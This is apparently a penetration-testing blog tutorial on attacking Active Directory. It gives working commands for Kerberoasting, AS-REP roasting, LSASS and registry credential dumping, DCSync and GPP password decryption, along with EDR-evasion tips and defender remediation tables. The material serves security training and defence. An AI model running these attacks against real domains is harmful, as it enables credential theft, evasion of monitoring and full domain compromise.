Active Directory Penetration Testing Part 2: Exploitation, BloodHound, Detection, and Case Study
Active Directory Penetration Testing is a controlled, authorized simulation of how an attacker would break into your company’s Active Directory environment.
Think of it like hiring someone to try to break into your house – but instead of picking locks or climbing through windows, they’re trying to steal digital keys, trick users, and find hidden doors inside your network.
Part 1 Recap: Active Directory Penetration Testing
Active Directory Fundamentals
Think of Active Directory as your company’s digital phonebook and security guard rolled into one. It knows who everyone is, what they’re allowed to access, and how they should prove their identity.
Active Directory is built in layers. The Forest is the castle wall – nothing gets in or out without crossing that boundary. Inside, you have Trees (domains that share a name, like corp.com and dev.corp.com). Then comes the Domain itself – the main unit where users, computers, and policies live. And finally Organizational Units – folders that help delegate control.
The heart of Active Directory is the Domain Controller (DC). It holds the ntds.dit file – the crown jewels containing every Active Directory user account, password hash, and group membership. Take over a DC, and you own the whole Active Directory forest.
Active Directory uses two ways to prove who you are:
Kerberos – The modern, ticket-based system. Most of our attacks target specific steps in its ticket flow.
NTLM – The old, chatty protocol. Its hashes can be captured, cracked, or replayed.
Bottom line: When you type a hostname, Active Directory uses Kerberos. Type an IP address, and it falls back to NTLM. That one detail shapes almost every attack we run.
Modern Active Directory Threat Landscape (2026)
The core Active Directory attacks still work. But defenders have gotten better.
Microsoft has finally started locking things down. New Windows Server 2025 boxes have SMB signing on by default and the Print Spooler turned off – two things we used to rely on heavily. But most companies run a mix of old and new, so the classic Active Directory tricks usually still land.
EDR tools like CrowdStrike and Defender are everywhere now. You can’t just run Mimikatz anymore without getting caught. We’ve had to get smarter – using legitimate Windows tools (LOLBins), custom loaders, and network-based extraction instead of dumping memory directly.
BloodHound, our favorite Active Directory mapping tool, got a major upgrade. It now maps cloud-to-on-prem paths too. And hybrid Active Directory (on-prem plus Entra ID) has created new two-way attack routes.
Bottom line: The old Active Directory techniques still work. But how you deliver them matters more than ever.
Active Directory Reconnaissance
Before you ever touch the network, start digging.
Passive recon is zero-risk information gathering. Check LinkedIn for employee names (those become Active Directory usernames). Look at job postings to see what Active Directory tools they use. Search breach databases – I’ve found working Active Directory credentials before even scanning a single IP more times than you’d believe.
Once you’re on the network, ask Active Directory‘s own DNS where the Domain Controllers are using SRV record lookups. Then run a targeted port scan — looking for Active Directory‘s fingerprints: port 88 (Kerberos), 389 (LDAP), 445 (SMB), 5985 (WinRM).
The single best unauthenticated Active Directory command? Just run netexec smb against the subnet. The SMB banner tells you the domain name, OS versions, and whether SMB signing is on — all without a password.
Bottom line: Good Active Directory recon turns weeks of work into days. DNS and SMB sweeps are your best friends.
Active Directory Enumeration
Once you have any Active Directory credential – even a lowly standard user – you can ask Active Directory almost anything. That’s by design.
Start with these Active Directory queries:
Users and their descriptions – IT people stash passwords in the description field CONSTANTLY
Accounts with SPNs – these are your Kerberoasting targets
Accounts without pre-authentication – AS-REP roasting targets
Computers with unconstrained delegation – TGT theft opportunities
Then check SYSVOL and NETLOGON shares. I cannot tell you how many times I’ve found passwords sitting in old Group Policy files or login scripts. It’s embarrassingly common.
PowerView is still my go-to for Active Directory enumeration on Windows. Get-DomainUser, Find-LocalAdminAccess, Get-DomainTrust — learn these.
Bottom line: With any Active Directory account, run get-desc-users and check SYSVOL first. You’ll often find credentials that require zero cracking.
Initial Access to Active Directory
How do you get that first Active Directory credential? Three reliable ways.
LLMNR/NBT-NS poisoning (Responder): When a Windows machine can’t find a host via DNS, it broadcasts “Who has this?” Anyone can answer — including you. When the victim tries to authenticate, you capture their NTLM hash. It works in over 70% of Active Directory environments. Run Responder during business hours and you’ll often get credentials within an hour.
NTLM relay: Instead of cracking that hash, just forward it in real-time to another machine. If that machine doesn’t require SMB signing, you’re in. No cracking needed.
Password spraying: Pick one or two common passwords (like Summer2026!) and try them against every Active Directory user. Stay under the lockout threshold. Always check the Active Directory password policy first – lockouts will get your engagement cancelled fast.
Use Kerbrute for spraying. It uses Kerberos instead of SMB, which generates fewer alerts on the Active Directory Domain Controller.
Bottom line: LLMNR poisoning is still your highest-percentage first move. Check the lockout policy before spraying anything.
Active Directory Exploitation (SPN Attack Surface)
Here’s a crazy fact about Active Directory: any domain user can ask for a Kerberos ticket for ANY service account in the domain. Not just the ones they’re allowed to use. ANY of them.
That ticket is encrypted with that service account’s password hash.
So you just request tickets for every service account you can find, save them to disk, and crack them offline at your leisure. That’s Kerberoasting. It’s not a bug. It’s how Active Directory Kerberos was designed.
Which service accounts should you target first? Look at pwdlastset — when was the password last changed? An account from 2019 is almost certainly weaker than one from last month. Also prioritize accounts that have been in privileged Active Directory groups (adminCount=1).
Bottom line: Every Active Directory service account with a human-set password is a Kerberoasting target. Go for the oldest passwords first.
So that was Part 1 – finding your way into Active Directory.
Part 2 is where we actually break things. Now that you have Active Directory credentials and know which service accounts to target, we’ll dive into:
Kerberoasting – actually requesting and cracking those Active Directory tickets
AS-REP Roasting – when Active Directory accounts don’t require pre-authentication
Credential Access – pulling secrets from LSASS, DPAPI, and using LOLBins in Active Directory
BloodHound – mapping Active Directory attack paths like a pro
Common mistakes – what I see new testers get wrong in Active Directory
Detection – what actually lights up the blue team’s screens
Full case study – from a lowly Active Directory user to Domain Admin
Kerberoasting
Kerberoasting is the single most reliable technique in Active Directory penetration testing.
I’ve run it in dozens of environments, and I can count on one hand the number of times it completely failed. Not because I’m special – because of how Active Directory is built.
Here’s the thing about Kerberoasting: it exploits a design feature, not a bug. That means Microsoft can’t patch it away. The only defenses are operational changes — stronger passwords, migrating to Group Managed Service Accounts (gMSAs), or forcing AES-only encryption. Until organizations actually do those things, the attack surface just sits there waiting.
Why Kerberoasting Works at the Active Directory Protocol Level
Let me explain what’s actually happening under the hood in Active Directory.
When you – as an authenticated Active Directory domain user – need to connect to a service like SQL Server or a file share, your computer asks the Active Directory Domain Controller (KDC) for a ticket. That request looks something like: “Hey, give me a ticket for the service running on SQLSRV01.”
The Active Directory Domain Controller finds the service account associated with that service (let’s call it svc_sql), grabs its password hash, and encrypts the ticket using that hash. Then it hands the encrypted ticket back to you.
Here’s the critical Active Directory design choice: The Domain Controller has no idea what you plan to do with that ticket after you receive it. It doesn’t check if you’re authorized to use that service. It just encrypts the ticket and sends it.
So you take that encrypted ticket, save it to disk, and walk away. The Active Directory Domain Controller just logged a normal service ticket request – nothing suspicious. But now you have an encrypted blob that you can crack offline, on your own time, with your own GPU rig, making as much noise as you want.
That’s Kerberoasting. The attacker’s interaction with Active Directory infrastructure is completely legitimate and indistinguishable from normal behavior — right up until they start feeding hashes to Hashcat.
Step-by-Step Kerberoasting in Active Directory
Let me walk you through exactly how I run this on an Active Directory engagement.
Enumerate All Active Directory SPN Accounts and Assess Priority
First, ask Active Directory for a list of every service account (accounts with SPNs). Don’t request tickets yet — just get the lay of the land.
Impacket — list all SPNs without requesting tickets GetUserSPNs.py corp.example.com/jsmith:'Password1' \ -dc-ip 192.168.1.100
The output tells you:
sAMAccountName— the account nameSPN— what service it runspwdlastset— when the password was last changed (this is gold)memberOf— what Active Directory groups it belongs to
Read this output before requesting anything. Build your priority list:
| Priority | What to Look For | Why |
|---|---|---|
| Highest | Accounts in Active Directory privileged groups (Domain Admins, Backup Operators) | Crack these and you’re close to owning the domain |
| High | pwdlastset older than 12 months | Old passwords are usually weak |
| High | SPNs suggesting high-value services (SQL, backup, Exchange, monitoring) | These accounts often have broad access |
| Medium | Accounts where RC4 encryption isn’t disabled | RC4 cracks faster than AES |
I cannot stress this enough: do not just roast every Active Directory SPN account blindly. Prioritization saves time and keeps you stealthier.
Request Active Directory Tickets for Targeted Accounts
Now ask Active Directory for the actual encrypted tickets.
Request tickets for all SPN accounts and save hashes GetUserSPNs.py corp.example.com/jsmith:'Password1' \ -dc-ip 192.168.1.100 \ -request \ -outputfile tgs_hashes.txt Request a ticket for a single specific account (much stealthier) GetUserSPNs.py corp.example.com/jsmith:'Password1' \ -dc-ip 192.168.1.100 \ -request-user svc_sql \ -outputfile svc_sql_hash.txt Using NetExec — great for pipeline integration netexec ldap 192.168.1.100 -u jsmith -p 'Password1' \ --kerberoasting kerberoast_output.txt Using Rubeus on Windows (in-memory, no disk artifacts) Rubeus.exe kerberoast /outfile:tgs_hashes.txt Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql.txt
Pro tip: If you’re worried about detection, request tickets for one or two high-value Active Directory accounts, not all of them. Space the requests out over hours. Quality over quantity.
Identify Encryption Type Before You Invest Crack Time
Look at the hash header. It tells you exactly what you’re dealing with.
$krb5tgs$23$* → RC4-HMAC → Hashcat mode 13100 → Fast crack $krb5tgs$17$* → AES-128 → Hashcat mode 19600 → Slow crack $krb5tgs$18$* → AES-256 → Hashcat mode 19700 → Very slow crack
If you only see AES tickets, that means RC4 has been explicitly disabled for that Active Directory account or domain-wide. That’s a more mature security posture — good for them. But don’t give up. AES tickets are still crackable for high-value accounts if the password is weak enough to appear in wordlists. It just takes longer.
Crack with Hashcat (Layered Approach)
Don’t just run one cracking pass and give up. Build layers.
Layer 1: Dictionary + best64 rules – this covers most enterprise passwords
hashcat -m 13100 tgs_hashes.txt /usr/share/wordlists/rockyou.txt \ -r /usr/share/hashcat/rules/best64.rule --force -O
Layer 2: Dictionary + deeper rulesets — for passwords that survived layer 1
hashcat -m 13100 tgs_hashes.txt /usr/share/wordlists/rockyou.txt \ -r /usr/share/hashcat/rules/d3ad0ne.rule --force -O
Layer 3: Mask attack targeting enterprise password patterns
Pattern: Capital + 5-7 lowercase + 2-4 digits + symbol hashcat -m 13100 tgs_hashes.txt \ -a 3 ?u?l?l?l?l?l?d?d?d?d! --force Pattern: Season + Year + Symbol (Summer2026!, Winter2025@) hashcat -m 13100 tgs_hashes.txt \ -a 3 -1 ?u?l?l?l?l?l?l?d?d?d?d!?s --force
Layer 4: Company-specific wordlist with rules — this is where you win
hashcat -m 13100 tgs_hashes.txt company_wordlist.txt \ -r /usr/share/hashcat/rules/best64.rule \ -r /usr/share/hashcat/rules/toggles1.rule --force
For AES-256 tickets – same layered approach, different mode:
hashcat -m 19700 tgs_hashes.txt /usr/share/wordlists/rockyou.txt \ -r /usr/share/hashcat/rules/best64.rule --force
Validate and Contextualize Your Cracked Active Directory Credentials
You cracked a hash. Now what? Don’t assume it works. Verify.
Verify the password is valid and hasn't expired netexec smb 192.168.1.100 -u svc_sql -p 'SqlSvc2024!' --no-brute Check what the account can access across Active Directory netexec smb 192.168.1.0/24 -u svc_sql -p 'SqlSvc2024!' --no-brute Determine Active Directory group membership and privilege level netexec ldap 192.168.1.100 -u jsmith -p 'Password1' \ --query "(sAMAccountName=svc_sql)" "memberOf"
You might find that svc_sql is just a regular user – low value. Or you might find it’s a Domain Admin. You won’t know until you check.
Targeted Kerberoasting for Stealth-Conscious Active Directory Engagements
Here’s something most people don’t think about: every Active Directory TGS request for a user account SPN generates Event 4769 on the Domain Controller.
In environments with Microsoft Defender for Identity or a well-tuned SIEM, a burst of RC4 TGS requests from a single source for multiple Active Directory accounts is a reliable detection signal. I’ve seen SOC teams catch this in real time.
How to stay stealthier when Kerberoasting Active Directory:
Request tickets for one or two high-value Active Directory accounts, not all of them
Space your requests out over the engagement window (don’t do them all at 2 AM)
Use Rubeus with the
/opsecflag – it requests tickets using the account’s highest supported encryption type, avoiding the RC4 detection heuristic
Rubeus with OPSEC flag — requests AES tickets to avoid RC4 detection
Rubeus.exe kerberoast /user:svc_sql /rc4opsec /nowrapWhat Active Directory Defenders Should Know
If you’re defending Active Directory, here’s what I’d tell you to do.
Immediate actions (do these this week):
Audit all Active Directory accounts with SPNs Get-ADUser -Filter {ServicePrincipalName -ne "$null"} ` -Properties ServicePrincipalName, PasswordLastSet, MemberOf
Any Active Directory account with:
An SPN
A human-readable password (not a gMSA auto-managed password)
Membership in a privileged group
That’s a critical risk. Treat it like one.
Strategic remediations (work toward these):
| Fix | Why It Works |
|---|---|
| Migrate service accounts to Group Managed Service Accounts (gMSAs) | 120-character auto-rotating passwords — not crackable |
| Enforce minimum 25-character passphrase + annual rotation for accounts that can’t use gMSAs | Length defeats cracking |
| Enable AES-only Kerberos encryption for service accounts where possible | Slows down cracking significantly |
| Deploy honeypot SPNs — fake service accounts that alert on any TGS request | A TGS request for a service nothing should be accessing is always malicious |
The honeypot approach is clever: create an Active Directory account with an SPN that nothing in your environment actually uses. Set up an alert on Event 4769 for that SPN. If you see a request for it, someone is Kerberoasting.
AS-REP Roasting
Let me introduce you to a technique that feels almost like cheating when you first use it. AS-REP Roasting lets you extract crackable password material from Active Directory without ever providing a password yourself. No credentials. No authentication. Just a username.
It targets a specific type of Active Directory account: those that have had their primary authentication protection deliberately disabled. Understanding why this setting exists – and why it still appears in production Active Directory environments – helps you find these accounts and helps defenders justify finally removing the setting.
The Active Directory Mechanism in Plain Terms
Before I explain the attack, let me explain how Active Directory Kerberos normally works.
Normal Active Directory Authentication (Pre-authentication enabled):
When you want to log into Active Directory, your computer sends an authentication request to the Domain Controller. But before the Domain Controller gives you anything useful, it says: “Prove you know the password.” Your computer encrypts the current timestamp using your password hash and sends it back. The Domain Controller decrypts it. If the timestamp makes sense (not too old, not in the future), the Domain Controller knows you have the correct password and issues a Ticket Granting Ticket (TGT).
That extra “prove it” step is called Kerberos pre-authentication. It’s enabled by default on every Active Directory account. It’s what prevents someone from just asking for encrypted material without knowing the password.
What happens when pre-authentication is disabled in Active Directory:
Some Active Directory accounts have a flag called DONT_REQ_PREAUTH set in their userAccountControl attribute. When that flag is present, the Domain Controller skips the “prove it” step entirely.
Here’s what that means for an attacker: I can send an authentication request to Active Directory for that account, and the Domain Controller will happily hand me an AS-REP message – which contains an encrypted blob derived directly from the account’s password hash – without asking me to prove anything. I don’t need the password. I don’t even need to guess.
I just need a valid username.
Then I take that encrypted blob home and crack it offline.
That’s AS-REP Roasting.
Why This Active Directory Configuration Exists in the Wild
You might be thinking: “Why would anyone disable pre-authentication in Active Directory? That sounds insane.”
You’re right. It shouldn’t exist in most modern Active Directory environments. But it persists for several reasons:
| Reason | Explanation |
|---|---|
| Legacy applications | Older UNIX/Linux Kerberos clients and some custom in-house applications don’t support Kerberos pre-authentication. They literally cannot work without this flag enabled. |
| Careless troubleshooting | An administrator enables the flag temporarily to diagnose a Kerberos issue, fixes the problem, and forgets to re-enable pre-authentication. The account sits there for years. |
| Migration residue | Accounts migrated from older directory systems (like NIS or early Kerberos realms) that didn’t have pre-authentication as a concept sometimes retain the disabled setting. |
| Vendor requirements | Some enterprise software vendors have historically required this flag as part of their deployment documentation. “Step 5: Disable Kerberos pre-authentication for the service account.” Yes, really. |
In my experience, the most common cause is legacy applications. An organization has some ancient system that can’t handle pre-authentication, so they create a service account with the flag enabled, and that account just stays that way for a decade.
Executing AS-REP Roasting Against Active Directory
Let me walk you through exactly how to run this attack.
Scenario 1: Without Any Active Directory Credentials (Just Usernames)
This is the most powerful version of the attack. You need a list of Active Directory usernames and nothing else.
First, build a username list from OSINT (LinkedIn, company website, email format) Then attempt unauthenticated AS-REP roasting against Active Directory GetNPUsers.py corp.example.com/ \ -usersfile valid_users.txt \ -dc-ip 192.168.1.100 \ -no-pass \ -request \ -format hashcat \ -outputfile asrep_hashes.txt
If you don’t have a username list yet, you can enumerate valid Active Directory usernames without authentication using Kerbrute:
Username enumeration via Kerbrute — confirms valid users without any credentials kerbrute userenum \ -d corp.example.com \ --dc 192.168.1.100 \ /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt \ -o valid_users.txt Now roast the confirmed Active Directory usernames GetNPUsers.py corp.example.com/ \ -usersfile valid_users.txt \ -dc-ip 192.168.1.100 \ -no-pass \ -request \ -format hashcat
Here’s how Kerbrute’s username enumeration works: it sends AS-REQ messages to Active Directory and analyzes the KDC’s error response. KDC_ERR_C_PRINCIPAL_UNKNOWN means the username doesn’t exist. Any other response (including authentication errors) confirms the Active Directory account is valid.
Scenario 2: With Valid Active Directory Credentials (Enumerate and Roast in One Step)
If you already have a set of Active Directory credentials, you can ask Active Directory directly which accounts have pre-authentication disabled, then roast them in one command.
Impacket — enumerate all roastable Active Directory accounts and request hashes GetNPUsers.py corp.example.com/jsmith:'Password1' \ -dc-ip 192.168.1.100 \ -request \ -format hashcat \ -outputfile asrep_hashes.txt NetExec — integrated approach netexec ldap 192.168.1.100 -u jsmith -p 'Password1' \ --asreproast asrep_hashes.txt Rubeus on Windows Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
Cracking AS-REP Hashes (Hashcat Mode 18200)
AS-REP hashes use Hashcat mode 18200. The cracking approach is the same as Kerberoasting — layered and patient.
Layer 1: Dictionary + best64 rules (covers most enterprise passwords) hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt \ -r /usr/share/hashcat/rules/best64.rule --force -O Layer 2: Combined rules for better coverage hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt \ -r /usr/share/hashcat/rules/best64.rule \ -r /usr/share/hashcat/rules/toggles1.rule --force Layer 3: Mask attack targeting enterprise password patterns Pattern: Capital + 5-7 lowercase + 2-4 digits + symbol hashcat -m 18200 asrep_hashes.txt \ -a 3 ?u?l?l?l?l?l?l?d?d?d?d! --force Layer 4: Custom organizational wordlist (company name, projects, locations) hashcat -m 18200 asrep_hashes.txt company_wordlist.txt \ -r /usr/share/hashcat/rules/best64.rule --force
Head-to-Head: Kerberoasting vs. AS-REP Roasting in Active Directory
Let me compare these two Active Directory attacks side by side, because people confuse them all the time.
| Attribute | Kerberoasting | AS-REP Roasting |
|---|---|---|
| Credentials required | Any valid Active Directory domain user account | None (just a username) |
| Target condition in Active Directory | SPN registered on the account | Pre-authentication disabled (DONT_REQ_PREAUTH) |
| Hash format | $krb5tgs$ | $krb5asrep$ |
| Hashcat mode | 13100 (RC4) or 19700 (AES-256) | 18200 |
| How common in real Active Directory environments? | Very high — almost every environment has SPN accounts | Moderate — maybe 5-15% of environments |
| Active Directory detection Event ID | 4769 (TGS request) | 4768 (TGT request) |
| Best fix | Migrate to gMSAs; enforce AES-only encryption | Re-enable Kerberos pre-authentication |
| Stealthiest variant | Single targeted request with /rc4opsec | Single targeted request |
When AS-REP Roasting Outperforms Kerberoasting in Active Directory
Here’s an interesting pattern I’ve seen in mature Active Directory environments.
Organizations that have good security maturity often focus heavily on Kerberoasting. They migrate service accounts to gMSAs. They enforce AES-only encryption. They rotate service account passwords regularly. Kerberoasting becomes difficult or impossible.
But those same organizations often overlook AS-REP Roastable accounts.
Why? Because AS-REP Roastable accounts are usually service accounts for legacy applications that “just work” and nobody wants to touch. They fly under the radar. Security teams aren’t scanning for the DONT_REQ_PREAUTH flag the way they scan for SPNs.
So in environments where Kerberoasting has been effectively hardened, AS-REP Roasting sometimes becomes the easier path. The accounts have weaker passwords precisely because they’re less visible to security teams.
What Active Directory Defenders Should Know
If you’re defending Active Directory, here’s how to find and fix AS-REP Roastable accounts.
Find them immediately:
Find all Active Directory accounts with pre-authentication disabled Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties * | Select-Object SamAccountName, DistinguishedName, Enabled, PasswordLastSet
Remediation options (in order of preference):
| Option | Action |
|---|---|
| Best | Re-enable Kerberos pre-authentication. Test the application first. Most modern systems work fine. |
| Good | If the application truly cannot support pre-authentication, migrate to a different authentication method or replace the application. |
| Acceptable temporary fix | Enforce a very strong password (25+ characters, random) and document the exception with a review date. |
Detection:
Event 4768 (TGT request) for accounts with pre-authentication disabled
Multiple 4768 events from a single source for different accounts = username enumeration
Any 4768 for a pre-auth-disabled account from an unexpected source IP = potential AS-REP Roasting
Credential Access
So far, we’ve focused on attacking Active Directory through its Kerberos protocol – requesting tickets, roasting hashes, cracking them offline. That’s one path.
But there’s a whole other category of credential access in Active Directory environments: going directly to where the credentials live.
We’re talking about extracting authentication material from system memory, registry hives, and the Active Directory database itself. These techniques require different levels of access — from local admin on a single workstation all the way to Domain Admin on a Domain Controller — and they produce different types of output.
Let me walk you through each one.
LSASS Memory – The Primary Credential Cache in Active Directory
Let me introduce you to one of the most valuable processes on any Windows machine in an Active Directory environment: LSASS (Local Security Authority Subsystem Service).
LSASS is responsible for authenticating users and managing security policies on a Windows machine. Here’s what makes it so valuable to us: it caches authentication material for active and recent sessions.
That includes:
NTLM hashes
Kerberos tickets
In some configurations, even cleartext passwords
Here’s the key insight: when you gain local admin on a machine in an Active Directory environment, LSASS gives you credentials for every user who has recently authenticated to that machine – not just the account you’re using. That might include IT managers, service accounts, even Domain Admins who RDP’d in to check something last week.
Remote LSASS Extraction (No Disk Touched)
You can extract LSASS credentials remotely without ever writing a file to the target disk. This is my preferred approach when it works.
NetExec lsassy module — remote LSASS extraction via multiple techniques netexec smb 192.168.1.50 -u admin -p 'Password1' -M lsassy comsvcs.dll method — LOLBin approach, often less detected by EDR netexec smb 192.168.1.50 -u admin -p 'Password1' -M comsvcs nanodump module — custom LSASS dumper with AV evasion built in netexec smb 192.168.1.50 -u admin -p 'Password1' -M nanodump
On-Target Using Mimikatz
If you’re on the machine itself and have admin rights, Mimikatz is the classic tool. You need SeDebugPrivilege (which administrators have by default).
Enable debug privilege and dump everything from LSASS privilege::debug sekurlsa::logonpasswords Export Kerberos tickets only (less noisy than full logonpasswords) sekurlsa::tickets /export Extract just NTLM hashes (narrower scope, sometimes evades detection) sekurlsa::msv
Warning: Modern EDR tools heavily signature Mimikatz. Running sekurlsa::logonpasswords in a mature environment will often trigger an immediate alert. Use the narrower commands first, or use the offline approach below.
Offline LSASS Minidump Approach (Evades Real-Time EDR)
Here’s my preferred method when facing heavy EDR: create a process dump of LSASS, then parse it offline on your own machine. The EDR sees a process dump (normal Windows administrative activity) but never sees the credential parsing.
Create minidump using comsvcs.dll (LOLBin — higher EDR bypass rate) rundll32.exe C:\Windows\System32\comsvcs.dll MiniDump \ (Get-Process lsass).id C:\Windows\Temp\lsass.dmp full Alternative: procdump from Sysinternals (may be blocked by some EDR) procdump.exe -ma lsass.exe lsass.dmp Transfer the dump to your attacker machine, parse with pypykatz pypykatz lsa minidump lsass.dmp Or parse with Mimikatz offline sekurlsa::minidump lsass.dmp sekurlsa::logonpasswords
What You Can Extract from LSASS in Active Directory
| Credential Type | Conditions | Attack Value |
|---|---|---|
| NTLM hash | Always present for recent logons | Pass-the-Hash, offline crack |
| Kerberos TGT | Active sessions | Pass-the-Ticket, Golden Ticket |
| Kerberos TGS | Active service sessions | Lateral movement |
| WDigest cleartext | WDigest enabled (rare in 2026, but persists) | Direct password reuse |
| Cached domain credentials (DPAPI) | Machine-level | Additional attack paths |
SAM Database and LSA Secrets
Beyond LSASS, Windows stores credentials in two other places that matter to us.
SAM (Security Account Manager) stores NTLM hashes for local accounts on that specific machine. Not domain accounts — local accounts like the local Administrator.
LSA Secrets stores credentials used by services and the OS itself. This is where things get interesting in Active Directory environments. LSA Secrets often contain:
Passwords of domain accounts running as services on the machine
The machine account password (Active Directory computer account)
Cached interactive logon credentials
Remote Extraction with secretsdump.py
Impacket secretsdump — remote extraction, requires local admin secretsdump.py corp.example.com/admin:'Password1'@192.168.1.50 The output has three sections: # [*] SAM hashes → local account NTLM hashes # [*] LSA secrets → service account creds, machine account hash # [*] Cached domain logons → DCC2 hashes (harder to crack than NTLM)
Why LSA Secrets Are Often More Valuable Than SAM in Active Directory
Think about it. Local account hashes (SAM) only let you move to other machines where that same local password is used – which is less common in well-managed Active Directory environments.
But LSA Secrets frequently contain the credentials of domain service accounts – backup agents, monitoring tools, automation scripts – that have been granted broad access across the Active Directory environment.
I’ve found the password of svc_backup in LSA Secrets and discovered it had Domain Admin rights more than once. That’s not a rare finding.
Local Extraction (If You’re on the Machine)
Save registry hives reg save HKLM\SAM C:\Windows\Temp\sam.hive reg save HKLM\SYSTEM C:\Windows\Temp\system.hive reg save HKLM\SECURITY C:\Windows\Temp\security.hive Parse offline on attacker machine secretsdump.py -sam sam.hive -system system.hive -security security.hive LOCAL
DCSync – The Active Directory Domain-Wide Hash Extraction
Now let me show you the crown jewel of Active Directory credential access.
DCSync lets you extract password hashes for every account in the entire Active Directory domain – without ever touching a Domain Controller’s filesystem. No disk access. No file transfer. Just a legitimate protocol request.
Here’s how it works: DCSync abuses the Directory Replication Service (DRS) remote protocol – the same mechanism real Domain Controllers use to replicate Active Directory changes. You’re essentially telling a Domain Controller: “Hey, replicate your Active Directory database to me.”
If your account has the right permission, the Domain Controller happily complies and sends you password hashes for any Active Directory object you ask for.
What Active Directory Permission Do You Need?
Any account with the DS-Replication-Get-Changes-All extended right can execute DCSync.
By default in Active Directory, this right is held by:
Domain Controllers (they need to replicate)
Domain Admins
Enterprise Admins
But here’s where things get interesting: DACL misconfigurations in Active Directory can grant this right to other accounts. This is a specific BloodHound finding worth hunting for in every engagement. You’d be surprised how often a regular service account accidentally has DCSync rights.
Executing DCSync
DCSync — extract all NTLM hashes from the Active Directory domain secretsdump.py corp.example.com/DA_User:'DA_Password'@192.168.1.100 \ -just-dc-ntlm Full extraction including Kerberos keys and password history secretsdump.py corp.example.com/DA_User:'DA_Password'@192.168.1.100 Target a specific Active Directory account (e.g., krbtgt for Golden Ticket) secretsdump.py corp.example.com/DA_User:'DA_Password'@192.168.1.100 \ -just-dc-user krbtgt Mimikatz DCSync (on Windows) lsadump::dcsync /domain:corp.example.com /user:krbtgt lsadump::dcsync /domain:corp.example.com /all /csv
What DCSync Gives You
The output of a full DCSync provides:
The NTLM hash for every Active Directory account in the domain
The Kerberos keys (AES and RC4) for every account
The krbtgt hash — the master key for all Kerberos tickets in the domain
The krbtgt hash is the prerequisite for forging Golden Tickets (which we’ll cover in a later article). With that hash, you can forge tickets for any user in the Active Directory domain, including Domain Admin, whenever you want.
This is why DCSync represents the effective end-state of an Active Directory domain compromise. And it’s why DCSync is monitored so specifically by defenders.
GPP Credential Recovery – The Ancient Active Directory Artifact That Keeps Giving
Let me tell you about an Active Directory finding that should be dead but absolutely isn’t.
Back in the days of Windows Server 2008/2012, administrators could use Group Policy Preferences (GPP) to configure local administrator accounts, drive mappings, and scheduled tasks through GPOs. And they could include passwords right there in the GPP configuration.
Microsoft encrypted those passwords with AES-256. That sounds secure, right?
Then in 2012, Microsoft published the decryption key (MS14-025). They basically said: “Hey, this encryption was never meant to be security. Here’s how to decrypt it.”
So any cpassword attribute sitting in an Active Directory SYSVOL XML file is trivially decryptable. The key is publicly known. The decryption takes about three lines of Python.
Why GPP Credentials Still Appear in Active Directory Environments (2026)
Despite being a 12-year-old finding, GPP credentials still appear in a meaningful percentage of enterprise Active Directory environments. Why?
Organizations haven’t performed regular SYSVOL audits
Legacy GPOs were never migrated or cleaned up
Some administrators still use GPP for passwords (yes, in 2026)
Extracting GPP Credentials
Automated GPP credential extraction with NetExec netexec smb 192.168.1.100 -u jsmith -p 'Password1' -M gpp_password netexec smb 192.168.1.100 -u jsmith -p 'Password1' -M gpp_autologin Manual search for GPP files find /tmp/sysvol -name "*.xml" -exec grep -l "cpassword" {} \;
If you find a cpassword value, here’s how to decrypt it:
Manual decryption (Python) python3 -c " import base64 from Crypto.Cipher import AES key = base64.b64decode('4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b') enc = base64.b64decode(cpassword + '==') aes = AES.new(key, AES.MODE_CBC, b'\x00'*16) print(aes.decrypt(enc).decode('utf-8').strip()) "
That decryption key is the same in every Active Directory environment. Microsoft published it. There’s no secret to protect.
Learning the methodology is important, but mastering it requires hands-on practice.
If you’re serious about penetration testing, red teaming, or Active Directory security assessments, try realistic cybersecurity CTF labs that let you practice reconnaissance, enumeration, credential attacks, privilege escalation, and exploitation techniques in a safe environment.
Quick Recap: Active Directory Credential Access Methods
| Method | What Access Level You Need | What You Get | Detection Risk |
|---|---|---|---|
| LSASS dump | Local admin on a machine | NTLM hashes, Kerberos tickets for recent logons | High (Mimikatz) to Medium (offline dump) |
| SAM extraction | Local admin on a machine | Local account hashes | Medium |
| LSA Secrets | Local admin on a machine | Domain service account credentials, machine account | Medium |
| DCSync | Domain Admin (or DCSync right) | Every Active Directory account hash, including krbtgt | Very high (Event 4662) |
| GPP credentials | Any authenticated user who can read SYSVOL | Cleartext passwords from legacy GPOs | Low (old artifact) |
Bottom line: Credential access in Active Directory is about escalating your foothold. LSASS gives you credentials for users who have logged into that machine. DCSync gives you every hash in the domain – but requires Domain Admin or a misconfigured ACL. GPP gives you credentials from the past that organizations forgot to clean up. Use them in combination, and you’ll move through Active Directory environments faster than most defenders can track.